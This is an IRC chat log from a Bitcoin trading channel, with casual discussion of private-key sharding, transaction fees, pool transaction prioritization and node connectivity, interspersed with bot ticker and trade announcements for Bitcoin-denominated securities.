yeah, I'd be worried about anyplace you have a lot of btc that doesn't have a manual withdrawal process honestly. Apr 06 00:54:49 this is true. Apr 06 00:55:09 what about manual big selloff od stocks then? Apr 06 00:55:42 do y'all see any use in the btc economy for entities that hold slices of private keys for users? Apr 06 00:55:55 aka distributed wallet backup? Apr 06 00:55:56 not sure what'cha mean. (286 remember.) Apr 06 00:56:17 benkay the service is better offered by the guy's gf. Apr 06 00:56:27 suppose this russian guy has a wife which wife has a sister. Apr 06 00:56:34 he always travels with his wife and her sister. Apr 06 00:56:39 sometimes tanja is the wife and nadja is the sister Apr 06 00:56:41 kinky Apr 06 00:56:42 sometimes vice-versa. Apr 06 00:56:44 NOW. Apr 06 00:56:47 benkay: yes Apr 06 00:56:51 why'd the russian guy use you to hold half his keys ? Apr 06 00:56:56 [HAVELOCK] [SDICE] 1 @ 0.27000002 BTC [-] Apr 06 00:56:57 [HAVELOCK] [SDICE] 1 @ 0.27000001 BTC [-] Apr 06 00:56:58 why not give half to nadja and half to tanja ? Apr 06 00:56:58 [HAVELOCK] [SDICE] 1 @ 0.27 BTC [-] Apr 06 00:57:29 multi-sig has many interesting applications as well Apr 06 00:57:33 because nadja and tanja have a tendency to bitch out and cannot be depended on for professional service, other than the oral kind. Apr 06 00:57:39 maybe Apr 06 00:57:45 your service is publicly known tho. Apr 06 00:57:49 the girls are private to him only. Apr 06 00:57:54 so there's pros and cons. Apr 06 00:58:12 secret sharing allows one to reconstruct without all shared slices, though Apr 06 00:58:29 allowing one to leave slices with trusted relatives in addition to untrusted banks around the world Apr 06 00:58:30 im just saying, if you're goijng to shard your key, Apr 06 00:58:40 why use a publicly known and thus attackable holder of shards. Apr 06 00:58:49 ah, so as a part thing. Apr 06 00:58:50 sure. Apr 06 00:58:53 why not use 10 publicly known holders and 10 private? Apr 06 00:59:03 i'm looking at en-robust-ifying the thing Apr 06 00:59:04 well... why use a holder that's known for holding ? Apr 06 00:59:15 why not put a piece of paper in a bank locked chest say Apr 06 00:59:27 bank is over there Apr 06 00:59:30 i am all over world Apr 06 00:59:34 even so. Apr 06 00:59:37 sometimes on iss Apr 06 00:59:47 the fact that we know you hold shards adds a risk to you as a shard holder. Apr 06 01:00:21 sure, but shard holder ameliorates that risk by charging a fee for a useful service. some fraction of which fee should go to ops to blah blah blah Apr 06 01:00:25 now, this may not be a show stopper, i readily grant Apr 06 01:00:26 watch - tradtional accounting and auditing firms are going to get involved in the bitcoin security game - and insuring deposits while they're at it... Apr 06 01:00:36 pgp i wouldn't mind working with one. Apr 06 01:00:54 the ecosystem needs auditors and accountants. Apr 06 01:00:59 witness ALL THE THINGS. Apr 06 01:01:14 smickles should really get on that. Apr 06 01:01:14 already making inroads... Apr 06 01:02:56 [HAVELOCK] [SDICE] 1 @ 0.25200001 BTC [-] Apr 06 01:03:51 i think smickles is busy making more smickles. Apr 06 01:04:21 in addition to keysharding, i want to see merchant receipt/contract tracking as well Apr 06 01:04:33 a practice of requiring 2/3 key to unlock an address for owner, auditor, lawyer (in case owner dies) seems like a good start Apr 06 01:05:05 otc, but for merchants, and prettier. Apr 06 01:05:33 you can put whatever text you want into a txn... Apr 06 01:05:44 why put it in the blockchain Apr 06 01:05:49 when you can use the underlying crypto? Apr 06 01:05:53 i'm getting fed up with conf times Apr 06 01:05:56 [HAVELOCK] [SDICE] 1 @ 0.25200001 BTC [-] Apr 06 01:06:01 wtf are all these asics for Apr 06 01:06:10 what asics Apr 06 01:06:12 .25?!? Apr 06 01:06:12 ;) Apr 06 01:06:44 benkay: sure Apr 06 01:07:37 the thing would be relatively simple to implement Apr 06 01:07:45 big text box for receipts/contracts Apr 06 01:07:49 track all signing entities Apr 06 01:08:04 kinda buy into claim resolution, which is not a scalable thing Apr 06 01:09:13 interesting... Apr 06 01:09:34 ThickAsThieves the asics have little to do with tx processing. they just hash. Apr 06 01:09:39 we have a problem with nodes is what it is. Apr 06 01:10:21 how do we fix it Apr 06 01:10:26 so annoyed Apr 06 01:10:38 I got my stratum servers running today Apr 06 01:10:43 is running a node hard/costly? Apr 06 01:10:49 no Apr 06 01:11:13 can i node be used to expedite ones own transactions? Apr 06 01:11:17 a node* Apr 06 01:11:21 "a well-known Silicon Valley socialite and entrepreneur" Apr 06 01:11:25 ok, what the fuck is that ? Apr 06 01:11:25 i cant wait hours day trading Apr 06 01:11:33 ThickAsThieves yes. Apr 06 01:11:41 run a node, have it well connected, you'll be instamempooled. Apr 06 01:11:51 k where can learn to do this plz Apr 06 01:12:04 [HAVELOCK] [HIM] 10 @ 1.9 = 19 BTC [-] Apr 06 01:12:25 um. Apr 06 01:12:31 do you have bitcoin-qt ? Apr 06 01:12:37 yessor Apr 06 01:12:47 yessir Apr 06 01:12:56 [HAVELOCK] [SDICE] 1 @ 0.25100001 BTC [-] Apr 06 01:13:08 run it :) Apr 06 01:13:13 thats it? Apr 06 01:13:15 does multibit function as a node? Apr 06 01:13:16 mhm Apr 06 01:13:23 ok Apr 06 01:13:29 dunno benkay Apr 06 01:13:37 so how do i get my tx from outside services to go faster Apr 06 01:13:46 like from Weexchange Apr 06 01:13:52 eh? Apr 06 01:13:56 [HAVELOCK] [SDICE] 1 @ 0.25200001 BTC [+] Apr 06 01:14:05 ha you can't do that thickasthieves Apr 06 01:14:10 you have to be broadcasting your own txns Apr 06 01:14:16 ThickAsThieves yes unless you're on a shitty connection or something Apr 06 01:14:16 i figured, but needed to ask Apr 06 01:14:18 unless you can get them to send the tx to you Apr 06 01:14:32 broadcasting is the smaller part of the transactio Apr 06 01:14:34 nah this doesn't work on the otghers. wors on your own Apr 06 01:14:39 but its dying the fastest Apr 06 01:14:53 so there will be like 5 nodes Apr 06 01:14:55 so what can ukto do to expedite his outgoing tx? Apr 06 01:15:03 gox, guild, deepbit and another 2 Apr 06 01:15:12 soon, at this rate. Apr 06 01:15:44 i stopped running qt cuz it sucks Apr 06 01:15:52 didnt know i was he;ping the network with it on Apr 06 01:16:10 yeah. Apr 06 01:16:15 it does suck donkey balls. Apr 06 01:16:26 but with people turning it off we;'re already under the red. Apr 06 01:16:33 pretty soon network will crack up completely. Apr 06 01:16:37 fucking devs Apr 06 01:16:49 I am setting up 2 more nodes Apr 06 01:17:03 i'll put nodes on all my mining rigs too Apr 06 01:17:08 jborkl if you have the option, set them up in like mongolia and shit Apr 06 01:17:19 what i mean is, sorta-distant from the main spots Apr 06 01:17:42 I have 15 at least commercial internet connections across many different ip ranges Apr 06 01:17:57 ThickAsThieves: also, weex broadcasts txns to over 500 nodes :) Apr 06 01:18:04 seems atm 90%+ of nodes are on the euro fiberring, on the sf-la line and on the ny-boston line Apr 06 01:18:08 including the major pools Apr 06 01:18:19 Ukto then what's the spiel, no fees ? Apr 06 01:18:30 where I am - there are not any for 200 300 miles Apr 06 01:18:43 great. Apr 06 01:18:49 mircea_popescu: the issue is that none of the pools currently prioritize by tx fee rate Apr 06 01:18:56 [HAVELOCK] [SDICE] 2 @ 0.25200001 = 0.504 BTC [+] Apr 06 01:19:05 they just have a hard limit on how many txn's can be included per block Apr 06 01:19:18 so when things like sdice are being super popular etc Apr 06 01:19:25 sure they do Apr 06 01:19:26 it creates a backlog of txn processing Apr 06 01:19:29 !ticker h him Apr 06 01:19:31 [HAVELOCK:HIM] 1D: 1.90000000 / 1.9085 / 1.93000000 (16 shares, 30.53600000 BTC), 7D: 1.87000000 / 1.97486053 / 2.08000000 (114 shares, 225.13409996 BTC), 30D: 1.41000000 / 1.81479725 / 2.08000000 (730 shares, 1324.80199240 BTC) Apr 06 01:19:37 why wouldnt a pool prioritize by tx fees? Apr 06 01:19:48 i know 4 major pools that are first come first serve Apr 06 01:19:56 [HAVELOCK] [SDICE] 36 @ 0.25200001 = 9.072 BTC [+] Apr 06 01:19:56 well then you know 4 idiots. Apr 06 01:20:01 yes Apr 06 01:20:05 I never said it was smart Apr 06 01:20:09 or with the original bitcoin intentions Apr 06 01:20:17 Luke-Jr even completely blocks sdice txns (last i checked) Apr 06 01:20:18 socialists everywhere Apr 06 01:20:25 ya but we're talking actual pools here. Apr 06 01:20:30 leaving a larger backlog for those to be processed Apr 06 01:20:44 that's not how it works lol. Apr 06 01:20:46 but while he blocks sdice, it allows other txns to get processed at least Apr 06 01:20:51 oh? :) Apr 06 01:20:55 enlighten please Apr 06 01:20:57 [HAVELOCK] [VTX] 16 @ 0.43999999 = 7.04 BTC [+] Apr 06 01:20:57 wlel think. we havr 10k in the backlog. Apr 06 01:21:02 luke does like 1 block a day Apr 06 01:21:12 whether he puts in 500 txs including sdice or excluding s dice Apr 06 01:21:19 it makes no diff, there's always 500 non sdice txns in the pool Apr 06 01:21:26 sure Apr 06 01:21:31 i didnt say he was helping or hurting Apr 06 01:21:37 right. hence no difference Apr 06 01:21:40 sure you did Apr 06 01:21:41 hehe Apr 06 01:21:47 i think him doing it helps non sdice txns get through Apr 06 01:21:50 (when he finds a block) Apr 06 01:21:55 maybe. Apr 06 01:21:57 but causes the delay later for the next pool Apr 06 01:22:05 just pushes it off Apr 06 01:22:13 this boggles my mind Apr 06 01:22:22 now i see why mp rants so much Apr 06 01:22:30 you know people say that a lot ? Apr 06 01:22:38 *after* doing some reading etc. Apr 06 01:22:57 [HAVELOCK] [SDICE] 1 @ 0.2799999 BTC [+] Apr 06 01:22:58 [HAVELOCK] [SDICE] 1 @ 0.28 BTC [+] Apr 06 01:22:58 besides Apr 06 01:23:04 sdice pays higher than default txs Apr 06 01:23:08 bitcoin is way less cool if its slower than a credit card Apr 06 01:23:32 the fact is tho, i set mpex to pay 0.001. since then i have measured, and i had next-block inclusion for all payments Apr 06 01:23:36 so for the pools that prioritize based on tx fee, unless you specifically tell your client ot pay a higher tx fee than sdice (whatever it might adjust to) you will not get ahead of them Apr 06 01:23:41 this has been going on for months now. Apr 06 01:23:50 i am willing to pay Apr 06 01:23:57 as far as i can tell, fee + well connected node -> next block guaranteed. Apr 06 01:23:57 [HAVELOCK] [KCIM] 2 @ 1.179 = 2.358 BTC [-] Apr 06 01:23:58 ThickAsThieves: bitcoin has always been slower than credit card Apr 06 01:24:00 ThickAsThieves: what boggles your mind Apr 06 01:24:00 due to the confirms Apr 06 01:24:22 mircea_popescu: based on what you said, pools would be idiots to not include sorted by fee. Apr 06 01:24:27 yeah. Apr 06 01:24:29 recent sdice txn http://blockchain.info/tx/9463b605150c30faa7b7be495a871ff9d479c7a0281785bdb7cc80a91ddeff93 Apr 06 01:24:33 the shit hanging off of every facet of the dev and tx side of btc boggles my mind Apr 06 01:24:36 well, it's just my experience, but it's been pretty consistent. Apr 06 01:24:39 0.0012 btc is not the default txn fee Apr 06 01:24:40 in clients Apr 06 01:24:47 you have to make sure to pay higher Apr 06 01:24:48 maybe i am loved by pools and they prioritise me otherwise ? (seems improbable) Apr 06 01:25:04 i am basing it off of what you said atm :) Apr 06 01:25:09 it also depends on time of day Apr 06 01:25:18 and how many txns are being added to the network Apr 06 01:25:27 sometimes its fine, othertimse a giant backlog is created Apr 06 01:25:45 as far as i can see the backlog has been 5 to 10k txns for the past... 2 months ? Apr 06 01:25:46 5 ? Apr 06 01:25:50 first , the client sux, this causes people to not run nodes, then pools dont prioritize by what pays most, then even for those that do, we have services dealing in lots of btc that dont include fees at all Apr 06 01:25:51 ;;unconfirmed Apr 06 01:25:51 Error: "unconfirmed" is not a valid command. Apr 06 01:25:57 granted, most of those being nofee Apr 06 01:26:09 what is the command to see current unconfirmed tx Apr 06 01:26:15 so if your saying lower priced tx fees for your transfers are going through before highier pricesed sdice txns, then your thought that pools sort by tx fee is out the window, right? Apr 06 01:26:22 or are you purposefully setting higher tx fees? Apr 06 01:26:33 Ukto i am setting .1, and that s.dice seems to have made it in fast no ? Apr 06 01:26:35 ThickAsThieves: http://blockchain.info/unconfirmed-transactions Apr 06 01:26:42 708 atm Apr 06 01:26:46 711 Apr 06 01:26:55 .81 downloads so fast Apr 06 01:26:55 and counting up Apr 06 01:26:58 mostly with sdice Apr 06 01:27:07 most people work of 6 confs though Apr 06 01:27:13 already one node halfway- 10 minutes Apr 06 01:27:17 so unconfirmed is just part of the picture Apr 06 01:27:24 Status: Disconnected Apr 06 01:27:26 lol at blockchain Apr 06 01:27:42 when your limiting txns to say 500 when generating a block Apr 06 01:27:47 and esp if you are sorting by fee Apr 06 01:28:00 unless you pay a highre fee than sdice's already higher than default fee Apr 06 01:28:02 you wont be included Apr 06 01:28:06 for at least another 1~2 blocks Apr 06 01:28:08 i will pay that Apr 06 01:28:14 easy Apr 06 01:28:16 maybe it's my coinbases being real old ? Apr 06 01:28:29 it is only 1 line in the .conf file to change the fee structure Apr 06 01:28:33 mircea_popescu: no idea. blockchain.info is up to date Apr 06 01:28:50 if i'm trying to send 20btc quickly, in order to profit 10%, i dont care about paying even a .1btc fee Apr 06 01:28:57 [HAVELOCK] [VTX] 10 @ 0.44 = 4.4 BTC [+] Apr 06 01:29:05 jborkl: yes, but as as service, it's a huge pain to constantly change that one line and restart Apr 06 01:29:11 besides Apr 06 01:29:15 the issue isnt the fee itself Apr 06 01:29:24 but it is one part Apr 06 01:29:26 as I stated, very few high block pools sort by tx fee Apr 06 01:29:30 I keep mine very low, just because Apr 06 01:29:33 may as well solve one part at a time Apr 06 01:29:44 during slow times, i have tested sending tx with a 0.1btc fee Apr 06 01:29:46 and it still took 3 hours Apr 06 01:29:54 same as the 0 fee tx Apr 06 01:29:56 this is so weird. Apr 06 01:30:01 literally never happened to me this. Apr 06 01:30:02 :/ Apr 06 01:30:20 the issue is that bitcoin needs to be able handle larger amounts of txns Apr 06 01:30:24 if ti continues to grow Apr 06 01:30:33 and this is not corrected, then bitcoin will die. Apr 06 01:30:36 this was teh cause of the recent fork Apr 06 01:30:46 pools were told to increase the size of txn announcements Apr 06 01:30:53 so what did some do? set ungodly highly max's Apr 06 01:31:00 there's no such thinfg as ungodly. Apr 06 01:31:01 this conflicted with with a limitation in 0.8 Apr 06 01:31:02 1mb is 1mb. Apr 06 01:31:03 which caused a fork Apr 06 01:31:06 so what can the common user do to help Apr 06 01:31:11 hmm, I wonder if we addnode eachother with a fee structure we like - we will broadcast and get included faster- therefore prioritizing out transactions Apr 06 01:31:19 our Apr 06 01:31:20 ThickAsThieves post in mpoe's devs are idiots thread lol Apr 06 01:31:28 mircea_popescu: all pools did not set 1mb max txn lists Apr 06 01:31:33 thats what caused the fork Apr 06 01:31:36 yeah. Apr 06 01:31:38 along with a the max set to 0.8 Apr 06 01:31:59 the point was to increase the tx load. not limit them Apr 06 01:32:06 thats why there is the big update deadline Apr 06 01:32:42 so btc tx wont be free always Apr 06 01:32:55 btw, look at the blockchain unconfirmed list Apr 06 01:33:00 you will see the number dropped from 800+ Apr 06 01:33:00 at some point you WILL have to pay miner fees to get confirmed? Apr 06 01:33:02 back to 500~600 Apr 06 01:33:04 as a block just went out Apr 06 01:33:09 only taking abotu 200~300 txns with it Apr 06 01:33:22 its cuz i opened qt ;) Apr 06 01:33:26 hehe Apr 06 01:33:30 and if you look at that last block Apr 06 01:33:33 youw ill see they are mostly in order Apr 06 01:33:35 time wise Apr 06 01:33:38 not higher paid fees Apr 06 01:33:42 from recent txns Apr 06 01:34:05 kakobrekla what do yo usay to an idea of giving less weight to small bets on bitbet ? Apr 06 01:34:08 cant they distribute the work better Apr 06 01:34:15 like, under 0.0001 ? you only get 90% of the weight. Apr 06 01:34:18 like force you to process a tx in order to send one Apr 06 01:34:27 ThickAsThieves: thats another discussion for another day. :) Apr 06 01:34:29 back to coding for me :) Apr 06 01:34:35 but yes, it pisses me off too. Apr 06 01:34:48 Ukto that;'s a good point as to the order, but Apr 06 01:34:58 doesn't that reflect moreover how the miner sorted them ? Apr 06 01:35:04 (not necessarily how they selected them) Apr 06 01:35:08 how the pool sorted them Apr 06 01:35:09 didnt mean to rage at you directly, but if including fees helps at all, i'd appreciate it Apr 06 01:35:10 not the miner Apr 06 01:35:17 yes is what i meant Apr 06 01:35:26 yes, which goes back to my point Apr 06 01:35:30 that most of the pools are not sorting by txfee Apr 06 01:35:34 you can watch your bitcoind reject tranactions Apr 06 01:35:34 but by age Apr 06 01:35:38 but listen, just because they sorted it thart way in the getwork or w/e Apr 06 01:35:45 doesn't mean that it actually reflects the selection process Apr 06 01:35:52 well Apr 06 01:36:01 i was just looking at a txn witha higher fee Apr 06 01:36:02 no, t takes them as tit receives them and stomps them Apr 06 01:36:02 if i pick girls by their brasize i will still seat them at the table by height Apr 06 01:36:03 that was en queue Apr 06 01:36:07 and was not included in the block Apr 06 01:36:09 mircea_popescu you want even more cofulzed ppl ? :) Apr 06 01:36:10 as it Apr 06 01:36:14 so obviously, it wasnt sorted by higher txn fee Apr 06 01:36:15 kakobrekla all this dust ;/ Apr 06 01:36:16 Ukto, iirc it's not completely FCFS Apr 06 01:36:20 when deciding Apr 06 01:36:25 jurov: depends on teh pool Apr 06 01:36:26 100% Apr 06 01:36:26 do you know the sort of shit that happens when i have to pay out 500 BTC ? Apr 06 01:36:30 each do it their diff ways Apr 06 01:36:34 miners have by default some space reserved to no-fee txs Apr 06 01:36:42 mircea_popescu: keep in mind, I host and help with ozcoin :) Apr 06 01:36:48 ya well ppl will still bet dust even with 90% Apr 06 01:36:50 i am aware yeh Apr 06 01:36:50 and i work with alot of other pool operators due to hashpower Apr 06 01:37:00 kakobrekla you think ? Apr 06 01:37:14 i think half wouldnt even notice Apr 06 01:37:23 gah Apr 06 01:37:26 and txfee can be changed on the fly, no need to restart Apr 06 01:37:43 you didn't knew about bitcoind settxfee? Apr 06 01:37:44 jurov: yes, but not ona per-send unless you do a custom raw tx Apr 06 01:38:10 jurov: sending rpc calls to bitcoind to constantly try to change the txn fee per client send leaves bad things to possibly happen Apr 06 01:38:17 its not like an sql transaction Apr 06 01:38:27 mircea_popescu i could do it so there is no bet accepted if its not funded by at least N (can come in several txes or w/e) Apr 06 01:38:38 i dont know how many user syou have constatnly withdrawing, but I tend to get a few about the same time every few days Apr 06 01:38:47 usually because something is happening in the world Apr 06 01:38:56 [HAVELOCK] [HIM] 2 @ 1.9 = 3.8 BTC [-] Apr 06 01:39:26 but the method for handling this, and letting users throw whatever amoutn they want at a tx fee is coming with the new weex relesae Apr 06 01:39:46 then they can all donate to minors, just to find out it wont help Apr 06 01:39:49 ;) Apr 06 01:39:56 [HAVELOCK] [VTX] 9 @ 0.44 = 3.96 BTC [+] Apr 06 01:39:56 "minors" yes, bad joke :) Apr 06 01:40:14 :q Apr 06 01:40:26 this is not the vim window... Apr 06 01:40:33 are you sure? Apr 06 01:40:47 try :q! Apr 06 01:40:47 :s,mod6,wangs,g Apr 06 01:40:52 :%s,mod6,wangs,g Apr 06 01:40:55 yup Apr 06 01:40:57 [HAVELOCK] [SDICE] 3 @ 0.28099999 = 0.843 BTC [+] Apr 06 01:41:15 ha Apr 06 01:41:56 [HAVELOCK] [SDICE] 15 @ 0.281 = 4.215 BTC [+] Apr 06 01:42:07 well, i do have problems with coinbr deposits sitting there for hours Apr 06 01:42:12 kakobrekla meh. Apr 06 01:42:15 we think of this more. Apr 06 01:42:23 withdrawals waiting are rare Apr 06 01:42:43 cuz i have node running all the time with 90+ connections Apr 06 01:43:35 btw the withdrawal that triggered me ranting, ended up clearing in 15min... Apr 06 01:43:42 plus, adding a fee did help a bit Apr 06 01:43:46 from weex, 0tx fee Apr 06 01:44:04 the wait was all for the first conf Apr 06 01:44:07 then it zoomed Apr 06 01:46:24 it all has to do with nodes Apr 06 01:46:56 [HAVELOCK] [SDICE] 5 @ 0.281 = 1.405 BTC [+] Apr 06 01:47:25 [BTCTC] [GSDPT] 25 @ 0.00301 = 0.0753 BTC [-] Apr 06 01:47:28 [BTCTC] [GSDPT] 100 @ 0.003 = 0.3 BTC [-] Apr 06 01:47:49 network density Apr 06 01:48:43 if you're "well connected" so to speak, you're txn will get picked up quickly, irrespective of fee Apr 06 01:48:56 [HAVELOCK] [SDICE] 1 @ 0.281 BTC [+] Apr 06 01:49:16 nice to see a plus-tick on SDICE Apr 06 01:50:36 ;;asks 150 Apr 06 01:50:39 There are currently 11628.06 bitcoins offered at or under 150.0 USD, worth 1718711.96735 USD in total. | Data vintage: 0.0020 seconds Apr 06 01:51:03 ;;bids 0 Apr 06 01:51:04 There are currently 31145458 bitcoins demanded at or over 0.0 USD, worth 11787480.3755 USD in total. | Data vintage: 25.0973 seconds Apr 06 01:51:56 [HAVELOCK] [SDICE] 2 @ 0.28199999 = 0.564 BTC [+] Apr 06 01:58:56 [HAVELOCK] [VTX] 6 @ 0.43999999 = 2.64 BTC [-] Apr 06 02:01:57 !ticker h him Apr 06 02:02:00 [HAVELOCK:HIM] 1D: 1.90000000 / 1.90755556 / 1.93000000 (18 shares, 34.33600000 BTC), 7D: 1.87000000 / 1.97356983 / 2.08000000 (116 shares, 228.93409996 BTC), 30D: 1.41000000 / 1.81581095 / 2.08000000 (730 shares, 1325.54199220 BTC) Apr 06 02:06:26 [BTCTC] [ASICMINER-PT] 1 @ 0.778 BTC [-] Apr 06 02:06:56 [HAVELOCK] [VTX] 2 @ 0.43999999 = 0.88 BTC [-] Apr 06 02:09:56 [HAVELOCK] [SDICE] 2 @ 0.282 = 0.564 BTC [+] Apr 06 02:09:58 [HAVELOCK] [SDICE] 5 @ 0.282 = 1.41 BTC [+] Apr 06 02:10:04 if you're well connected, you generally don't have to suffer the same problems that normo's do anyways, pgp ;) Apr 06 02:10:31 word Apr 06 02:26:23 [BTCTC] [RSM] 1 @ 0.0026 BTC [+] Apr 06 02:26:46 [BTCTC] [RSM] 510 @ 0.0025 = 1.275 BTC [-] Apr 06 02:28:17 [BTCTC] [RSM] 496 @ 0.002011 = 0.9975 BTC [-] Apr 06 02:30:20 [BTCTC] [GSDPT] 8 @ 0.003355 = 0.0268 BTC [+] Apr 06 02:30:21 [BTCTC] [ASICMINER-PT] 1 @ 0.778 BTC [-] Apr 06 02:37:56 [HAVELOCK] [VTX] 19 @ 0.425 = 8.075 BTC [-] Apr 06 02:48:13 [MPEX] [S.MPOE] 10250 @ 0.00070053 = 7.1804 BTC [-] Apr 06 02:48:15 [MPEX] [S.MPOE] 6035 @ 0.00070873 = 4.2772 BTC [+] Apr 06 02:48:17 [MPEX] [S.MPOE] 3915 @ 0.00071 = 2.7797 BTC [+] Apr 06 02:53:56 [HAVELOCK] [SDICE] 6 @ 0.282 = 1.692 BTC [+] Apr 06 03:02:16 [BTCTC] [PAJKA.BOND] 1 @ 0.1029 BTC [+] Apr 06 03:04:53 [BTCTC] [PAJKA.BOND] 1 @ 0.1029 BTC [+] Apr 06 03:10:56 [HAVELOCK] [SDICE] 3 @ 0.262 = 0.786 BTC [-] Apr 06 03:11:17 Ukto: AFAIK, every pool prioitizes by fee/KB Apr 06 03:13:44 http://i.imgur.com/lPIoVfs.png Apr 06 03:14:56 [HAVELOCK] [SDICE] 4 @ 0.282 = 1.128 BTC [+] Apr 06 03:15:10 [MPEX] [S.DICE] 2900 @ 0.00286307 = 8.3029 BTC [-] Apr 06 03:15:21 is that obama behind the b Apr 06 03:18:54 probably Apr 06 03:20:04 obama is behind everything Apr 06 03:20:07 everything that is Apr 06 03:20:11 and everthing that will be Apr 06 03:28:10 !ticker h him Apr 06 03:28:11 [HAVELOCK:HIM] 1D: 1.90000000 / 1.90755556 / 1.93000000 (18 shares, 34.33600000 BTC), 7D: 1.87000000 / 1.97494825 / 2.08000000 (114 shares, 225.14409996 BTC), 30D: 1.41000000 / 1.82103054 / 2.08000000 (720 shares, 1311.14199220 BTC) Apr 06 03:28:40 !ticker m s.dice Apr 06 03:28:41 [MPEX:S.DICE] 1D: 0.00286307 / 0.00321072 / 0.00333333 (21008 shares, 67.45 BTC), 7D: 0.00286307 / 0.00324298 / 0.00439992 (541587 shares, 1,756.36 BTC), 30D: 0.00286307 / 0.00372327 / 0.006 (1707706 shares, 6,358.26 BTC) Apr 06 03:54:45 [BTCTC] [ASICMINER-PT] 1 @ 0.778 BTC [-] Apr 06 03:59:04 [MPEX] [S.DICE] 14 @ 0.00303497 = 0.0425 BTC [+] Apr 06 04:00:19 [BTCTC] [ASICMINER-PT] 3 @ 0.778 = 2.334 BTC [-] Apr 06 04:04:33 mircea_popescu, sorry, im around now Apr 06 04:06:54 hm Apr 06 04:06:57 a, yes! Apr 06 04:09:31 ;;ticker Apr 06 04:09:32 BTCUSD ticker | Best bid: 141.29339, Best ask: 142.00000, Bid-ask spread: 0.70661, Last trade: 142.00000, 24 hour volume: 69571.46909424, 24 hour low: 130.41000, 24 hour high: 144.94000, 24 hour vwap: 139.47741 Apr 06 04:09:33 ;;goxlag Apr 06 04:09:34 MtGox lag is 0 seconds. During this time, light travels 0.0 AU. You could have sent a bitcoin ... nowhere, really (0 AU). Apr 06 04:09:34 .bait Apr 06 04:14:59 ;;ident Apr 06 04:14:59 You are not identified. Apr 06 04:15:09 there ya go Apr 06 04:15:11 it filled Apr 06 04:15:12 http://jezus.si:81/render/?title=Mtgox+Lag+-+1+day&vtitle=Seconds&from=-1day&width=500&height=250&until=now&areaMode=none&lineMode=connected&target=alias%28bitcoin.mtgox.lag%2C%22Mtgox_lag%22%29 Apr 06 04:15:41 OFF TO SEE THE WIZARD, THE WONDERFUL WIZARD OF CHACHUNG Apr 06 04:16:03 http://jezus.si:81/render/?title=Mtgox+Lag+-+1+week&vtitle=Seconds&from=-1week&width=500&height=250&until=now&areaMode=none&lineMode=connected&target=alias%28bitcoin.mtgox.lag%2C%22Mtgox_lag%22%29&1365210931374 Apr 06 04:16:37 http://jezus.si/graf/dashboards/bitcoin/details/lag/ Apr 06 04:20:48 gribble goes down too much Apr 06 04:24:28 it's a netsplit Apr 06 04:24:36 This is glorious! Apr 06 04:24:37 it gets confused :) Apr 06 04:24:45 ;;gribble Apr 06 04:24:47 ugh Apr 06 04:29:00 !ticker m ^OIX Apr 06 04:29:02 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 93.3570601 / 108.2470225 / 135.80742037 (19613 shares, 8,037.73 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 06 04:41:15 Plan Ƀ, sounds good Apr 06 04:43:43 nice Apr 06 04:44:54 awesome grapfs, much appreciated Apr 06 04:45:02 graphs* Apr 06 04:45:45 graff my maffs and stuffs Apr 06 04:45:56 [HAVELOCK] [SDICE] 1 @ 0.2645 BTC [-] Apr 06 04:45:57 [HAVELOCK] [SDICE] 25 @ 0.264 = 6.6 BTC [-] Apr 06 04:45:59 [HAVELOCK] [SDICE] 30 @ 0.2636 = 7.908 BTC [-] Apr 06 04:46:00 [HAVELOCK] [SDICE] 8 @ 0.26301 = 2.1041 BTC [-] Apr 06 04:46:01 [HAVELOCK] [SDICE] 4 @ 0.2621 = 1.0484 BTC [-] Apr 06 04:46:02 [HAVELOCK] [SDICE] 9 @ 0.2601 = 2.3409 BTC [-] Apr 06 04:46:03 [HAVELOCK] [SDICE] 1 @ 0.2600002 BTC [-] Apr 06 04:46:03 [HAVELOCK] [SDICE] 1 @ 0.26000001 BTC [-] Apr 06 04:46:04 [HAVELOCK] [SDICE] 2 @ 0.25200001 = 0.504 BTC [-] Apr 06 04:46:05 [HAVELOCK] [SDICE] 15 @ 0.251 = 3.765 BTC [-] Apr 06 04:46:40 ill take next month's dividend for 0025 Apr 06 04:47:05 2.51. people are shortsighted Apr 06 04:47:19 dammit, one handed typing. Apr 06 04:47:34 lol Apr 06 04:47:46 busted wrst, not whackin it you pervs Apr 06 04:47:52 ;;seen smickles Apr 06 04:47:55 sitlol Apr 06 04:47:56 nvm Apr 06 04:48:02 *sit Apr 06 04:48:16 shit! Apr 06 04:48:37 hm, for march, bbet is over half of sdice per share Apr 06 04:48:55 bbet rocks. Apr 06 04:50:00 we are over half of march div right now for april if i see this correctly Apr 06 04:50:06 and its what, 6 days Apr 06 04:50:16 o well. Apr 06 04:52:55 [HAVELOCK] [SDICE] 1 @ 0.3067 BTC [+] Apr 06 04:53:55 [HAVELOCK] [SDICE] 1 @ 0.3067 BTC [+] Apr 06 04:54:40 [MPEX] [S.DICE] 325 @ 0.00303497 = 0.9864 BTC [+] Apr 06 04:54:55 [HAVELOCK] [SDICE] 2 @ 0.30679999 = 0.6136 BTC [+] Apr 06 04:55:55 [HAVELOCK] [SDICE] 1 @ 0.3067 BTC [-] Apr 06 04:56:22 scam. Apr 06 04:56:55 [HAVELOCK] [VTX] 7 @ 0.439 = 3.073 BTC [+] Apr 06 05:02:48 [BTCTC] [S.DICE-PT] 100 @ 0.004 = 0.4 BTC [-] Apr 06 05:02:54 [BTCTC] [S.DICE-PT] 158 @ 0.0039 = 0.6162 BTC [-] Apr 06 05:02:56 [BTCTC] [S.DICE-PT] 3000 @ 0.00385 = 11.55 BTC [-] Apr 06 05:03:00 [BTCTC] [S.DICE-PT] 250 @ 0.0038 = 0.95 BTC [-] Apr 06 05:03:02 [BTCTC] [S.DICE-PT] 204 @ 0.0037 = 0.7548 BTC [-] Apr 06 05:03:55 [HAVELOCK] [SDICE] 1 @ 0.306788 BTC [+] Apr 06 05:04:06 [MPEX] [S.DICE] 3800 @ 0.00303497 = 11.5329 BTC [+] Apr 06 05:11:03 [MPEX] [S.DICE] 61 @ 0.00303497 = 0.1851 BTC [+] Apr 06 05:14:32 [BTCTC] [ASICMINER-PT] 1 @ 0.777 BTC [-] Apr 06 05:15:45 [BTCTC] [ASICMINER-PT] 1 @ 0.778 BTC [+] Apr 06 05:15:55 [HAVELOCK] [SDICE] 1 @ 0.306788 BTC [+] Apr 06 05:16:56 [HAVELOCK] [HIM] 1 @ 1.9 BTC [-] Apr 06 05:18:17 [BTCTC] [BASIC-MINING] 6 @ 0.39 = 2.34 BTC [+] Apr 06 05:24:55 [HAVELOCK] [SDICE] 10 